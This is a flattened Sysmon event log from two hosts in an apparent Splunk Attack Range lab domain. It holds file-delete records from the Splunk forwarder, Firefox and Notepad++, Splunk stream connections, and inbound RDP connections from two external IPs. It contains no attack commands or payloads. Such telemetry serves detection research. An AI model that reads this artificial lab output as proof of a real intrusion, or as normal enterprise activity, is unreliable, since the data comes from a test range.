Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60F60DA8EA2E8212C0AE256CED69A16B,SHA256=375C04F0BE927B6D909CA0E8BFE560D40278E0D621CC1699E80C3340AE3DBD0C,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808184Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:33.846{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBCD19A38EA0EA2C5FC4C56F07C69143,SHA256=D3F2C437C75F605511D1DBBDF7CE27FE1E1BE19D0447EC23102049A54C9536EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808185Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:34.849{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E3B4BC7E2448C745433B3B6B15A88E4,SHA256=FA76D1214EF1C5D1D56DB87D8D1FEE0B8D76A651AC9D44988EA9A6EB453A9D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.977{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BE9D8B0922EC946DF8D3A194925E43C9,SHA256=1B504D146BB55E0025AED22D7BB7FD75335B331E0B3E07D14D4C6F75B08111D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.977{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=00C351BBC8A068C03C4CC151C637CF0B,SHA256=8944EBC41B529B94CF18A8BA3851DAD66ED2343DB1AA70022D973354DC260588,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.977{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D047AB7CBB9642EEB5C6E319BB339C58,SHA256=49782070D3D7235AB0B5FD458CB042342D75F7AF5ED326A120DBF82CB3001711,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.977{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FD826B267869799CFE5BBDE13084E408,SHA256=7BD672E66426A0E25ED7043577FD915E0C58D6CFC82DDAF0844F4AE1BA4D3304,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B93319FCAB6482AA7FA6D4BF9D2DD8A1,SHA256=39318F34D067578D140A83706EB96386EAD6DFE5D6B54DD5D5131C7A62FF0800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3ABCC88D4FC522E96DD58E1E39026DC4,SHA256=934727354BD3C59AA771345907FECFB176545F52596D77B9E56E6947D5DFB775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8F99C7F3F84F060F6E1DBF2C400E0DE2,SHA256=BCF38BC7515992C4001FE38BA4FD735BED4CDD79CC49312E25D02A7811647F23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=30168161A5E42860583DA71E013239FC,SHA256=29CDF69EF87CB350AE1111E8863A941EE0962D1C8D329FBBEBC4E4165ADBB6F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C341D05F6D3B02F77E9F3B298911F438,SHA256=566EE47D22CF23114B6B09941C19012227469F97A9A3E7BF59B2D8F4160A794C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=171573CB20DDF68559E9F29482BFD48F,SHA256=4888EAAB78A3D6973989A1098637976C9A92074F3C383CA87B3AD79580F29E3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.961{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=027F4B4B8F3E0F1E4F31B0882F6386CC,SHA256=DB4598C53B0C3B0ECDC77372B1723F8BE2652982C1E2329C7E94BE33C28DF7AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:34.908{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10FA2B36B8FD8E2AA57636C9DD4414EC,SHA256=D1386533CC9AC014E15C1C1AF37A009DAA585B36F24586096A1F40797309F2E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:35.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEDB1D5D743878C14DF13F5ED3543E51,SHA256=0217505D6CAE7C70B27836A2115BD179FDA05C16F2F7CFBF1B8AC20DE3186E47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808187Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:35.865{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3223044A79E4AD14FC8037C05970160,SHA256=41BE0062DE16A95AA73B20A65EF233BF298D2A5A9408DE8390B4904BD37AFE18,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808186Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:34.182{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57307-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:27.617{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51074-false10.0.1.12-8000- 23542300x80000000000000001050154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:36.944{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF28A8575FBD60A7EFC0DDED53044616,SHA256=D7A399576C290136C8BB196645DC2EDB7E5A3489F76D67FC48E797B30C03A14E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808188Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:36.865{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=422D795A92EB11D7B6AC5B7361EB2837,SHA256=5F08C57D7E1B3AE0B25B3F423CAFCE7F6B11C24D763F4CE421AFFB8FD4CD1091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:36.276{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A97593A9225E5F82ED9087A5394EF0C5,SHA256=F80A6FA355F533924E50F380745C05FD052EAE453AF1E367800F0E41AA958CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:36.276{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95F4E028F2513385B2A03A486B505647,SHA256=81AACA200B6975476B482923D83D3B2A05A671D3FF05BFBD2DC0F3F63860BA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:37.947{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE0AE9E2A5468986E657380E2BE2E1CF,SHA256=7ACC3FA913EB075CBBE14796555EE1334FD26016CEEBF209324355CD43ACBA8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808189Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:37.912{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59E5EC5779DFF9F1AF175D54BA2E7ED7,SHA256=BB81047F663A651EE718CA555069D5255669805BB30B7D7426C98E2E5F68C512,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:28.463{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-62357-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001050159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:38.977{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=2D6A92A460A139279C4630A278DFEFE4,SHA256=84A579986B735C0C89DF00474840FA0C475701D0F41E0129B21F78ED049C002D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:38.961{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FA522972EB2A6A8D38A4883168356D6,SHA256=E9337D376912F8D233C0B802F9F91DC55181CF1BC66DC3F4BA8909873F64DFA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808190Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:38.943{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4BE3E619DC6EE6D5141C30F7B9A6211,SHA256=648FC2FA52DECC2688A7A836C1650BC244CDBF1E2D158273BFB00D764F8BCB9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:38.562{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C5AA645F15ED149291047ED8A275E16C,SHA256=E0425EFA55D4A92744DE1B0E6335086D6D325DBFBCCB4217DD4BB368896F7EE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808191Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:39.959{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3460CD67ECF5C23E15B046EF1F30E6E6,SHA256=EBA8C82D25E5D045818D69CFE80BEE8E08BFBA180C168F486CB50244FE76FD0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:39.977{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C843327E77FC36480CC0400C906CA8C3,SHA256=9A971F327F2E191A8D3020DCF8C2EEBA4FFCB043884B759DABFAA6C320FCDD40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808193Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:40.974{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7ECD9DA509E4B5BDE1840CDF0E5C447,SHA256=3C6056B5F2BBB0BBC59FFB2BAC56FF422D3A1540046ADEECEC731FF6FE7D8A27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050161Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:40.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=956713282E6CC4347C1574DD85641A84,SHA256=D3D7CDCFF98EF5DFF1997BA6D949170A87467B054641D7EF2D631F85D865DBCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808192Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:39.216{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57308-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808197Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:41.990{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=475751BA00360B686974DF1BB1FB072E,SHA256=38F37DDF6C845C45169A698460C93C00CA2CA73FE3A814D9BD2251D38CACA855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808196Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:41.615{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=289C932C0685C56F3E411A901D46CEE6,SHA256=4D9983F4CE10AA119E42B1C7CC8C27C18785B1D5692CA9AD485C3B2877F2A788,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808195Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:41.615{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88DF46EC08E58DAC8FA434E4C9026427,SHA256=AF58291DF84503B51CDD697E28AF7A7A9C25DFFBAEE979CFF111CC451DB8FAA1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808194Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:40.078{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-28693-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001050162Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:33.616{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51075-false10.0.1.12-8000- 23542300x80000000000000001050163Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:42.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF7299115278107F6D12309F08549C68,SHA256=CCA6ECC1F7752F17334B4AB9D609C9D31A57550CBC548EFF0E84E4C0F38B59AE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808198Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:43.021{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD85EE3A5A27AAD240C6E07A894C0940,SHA256=5AC4C1C136C29CABF49E3A5B77A49CC62A4690EC74A6F5F746CD042C512D5B28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050164Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:43.010{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18C58B288C5D233D95A85F4CBD33491F,SHA256=E2C8132F502BE91C7EAA4BA74ABA9B5E4E80D6D03393E8B4A84107507D35632C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050165Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:44.017{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCD0E131322377A188DA9DBAFBDE200,SHA256=336E73E8480B60ECAA4838DE54EF5A489376578B4BF187AD61F366E9A4DA10BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808199Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:44.037{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0F06A8CEEBC9AB843DDEC6F2A3B28FA,SHA256=58D7D3021FA3688E94DC777BE2CF1008ACE63DA7FA29BD37A97B712AEAC1ED73,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808201Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:44.216{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57309-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808200Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:45.068{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0370C9625CFC20E83296BF5471A270DC,SHA256=9A744C9D7461B2553D490FA50D24032560744BAC1C663F631F43930DC4B5D7E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:45.981{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075517MD5=155CC9F979825BEE45EF207B050B7D2C,SHA256=38AB6E229618512120E48A0A6363AEC2CB75A2B891E3831ED57E88222CCCABB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:45.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD420761714A3F02C6B9D6ED88D186A0,SHA256=787A01AF58F7CD5851311D858DDB06C8850B68C23F895AF3055E34B72993C707,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808202Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:46.068{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFC4E952B0434B55A14041F485DD17AA,SHA256=DA71BC57A8C0ED642E18F493E4F257712426685F5E6D0FDB3DF3348D9D73D96E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:38.722{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51076-false10.0.1.12-8000- 23542300x80000000000000001050168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:46.031{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A191BA1A17DD51AAB9214FC667BA928E,SHA256=97B603D8F037BE2C62F3E5EDC1A45D3256FFAF615A0CAF85D330D2DA420F8E11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808203Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:47.099{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
